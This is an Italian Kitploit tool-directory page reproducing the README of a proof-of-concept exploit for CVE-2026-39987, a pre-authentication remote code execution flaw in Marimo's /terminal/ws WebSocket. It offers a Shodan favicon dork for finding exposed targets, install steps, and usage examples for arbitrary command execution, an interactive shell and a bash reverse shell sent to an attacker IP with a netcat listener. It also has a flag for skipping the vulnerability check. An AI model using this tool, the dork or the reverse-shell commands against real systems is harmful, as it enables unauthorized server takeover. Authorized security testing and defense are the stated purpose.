Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39987-POC — CVE-2026-39987 Strumento di exploit - Marimo < 0.23.0 RCE pre-autenticazione (WebSocket) | Kitploit
Strumenti/GitHubGitHub/m3ph1569/cve-2026-39987-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 Strumento di exploit - Marimo < 0.23.0 RCE pre-autenticazione (WebSocket)

Vedi Repository
211 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-39987 - Marimo < 0.23.0 RCE Pre-Autenticazione (WebSocket)

CVSS Severity Python License

Exploit Proof of Concept (PoC) per una vulnerabilità critica di Remote Code Execution (RCE) pre-autenticazione nelle versioni di Marimo precedenti alla 0.23.0.

La vulnerabilità consente a un attaccante non autenticato di connettersi all'endpoint WebSocket (/terminal/ws) ed eseguire comandi di sistema arbitrari sul server di destinazione.

Caratteristiche

  • Verifica automatica: Controlla automaticamente se il target è vulnerabile identificando la versione e verificando la presenza dell'applicazione Marimo (tramite gli endpoint favicon e /api/version).
  • Esecuzione di un singolo comando: Invia un singolo comando al target e ricevi l'output.
  • Shell interattiva: Avvia una shell persistente pseudo-interattiva per interagire con il target senza soluzione di continuità.
  • Generazione di reverse shell: Supporto integrato per generare ed eseguire payload di reverse shell.
  • Bypass della verifica: Possibilità di saltare i controlli di versione e presenza con il flag --no-check per ambienti in cui gli endpoint potrebbero essere oscurati.
  • Shodan / FOFA Dork

    Puoi usare il seguente dork per identificare istanze potenzialmente vulnerabili:

    root@kitploit:~
    http.favicon.hash:-1864630356
    

    Installazione

    Si consiglia di utilizzare un ambiente virtuale Python per installare le dipendenze.

    root@kitploit:~
    # 1. Clone the repository
    git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
    cd CVE-2026-39987-POC
    
    # 2. Create and activate a virtual environment
    python -m venv .CVE-2026-39987
    
    # Windows
    .CVE-2026-39987\Scripts\activate
    # Linux/macOS
    source .CVE-2026-39987/bin/activate
    
    # 3. Upgrade pip and Install required dependencies
    # Windows
    py pip install --upgrade pip ; pip install -r requirements.txt
    # Linux/MacOS
    python3 pip install --upgrade pip && pip install -r requirements.txt
    

    Utilizzo

    root@kitploit:~
    usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]
    
    positional arguments:
      target               Target URL (e.g. http://localhost:8080)
      command              Command to execute (omit when using -i)
    
    options:
      -h, --help           show this help message and exit
      --no-check           Skip vulnerability version check
    
    Execution modes:
      -i, --interactive    Interactive shell mode
      --revshell IP PORT   Generate & send a bash reverse shell payload
    
    WebSocket tuning:
      --ping-interval SEC  WebSocket ping interval in seconds (default: 30, more frequent for stability)
      --ping-timeout SEC   WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
      --no-ping            Disable WebSocket ping/pong entirely (recommended if still disconnect)
    
    Reconnect options:
      --max-retries N      Max auto-reconnect attempts (default: 5)
      --no-reconnect       Disable auto-reconnect on unexpected disconnect
    

    Esempi

    1. Esegui un singolo comando:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 "id"
    

    2. Avvia una shell interattiva:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 -i
    

    3. Esegui una reverse shell: Assicurati di avere un listener netcat in esecuzione sulla tua macchina (es. nc -lvnp 4444).

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444
    

    4. Salta i controlli di verifica e forza l'esecuzione:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check
    

    Contributi

    I contributi sono benvenuti! Non esitare a inviare una Pull Request.

    1. Forka il repository
    2. Crea il tuo branch per la funzionalità (git checkout -b feature/update-feature)
    3. Committa le tue modifiche (git commit -m 'Add update feature')
    4. Esegui il push del branch (git push origin feature/update-feature)
    5. Apri una Pull Request

    Disclaimer

    Questo strumento è strettamente per scopi educativi e hacking etico autorizzato. L'autore non è responsabile per qualsiasi uso improprio, danno o attività illegale causata da questo script. Assicurati sempre di avere il permesso esplicito del proprietario del sistema prima di eseguire qualsiasi test di sicurezza. L'uso non autorizzato di questo script è illegale e punibile per legge.

    Licenza

    Questo progetto è concesso in licenza sotto la MIT License - vedi il file LICENSE per i dettagli.


    Fatto con ☕︎ da M3PH1569
    Scarica lo strumento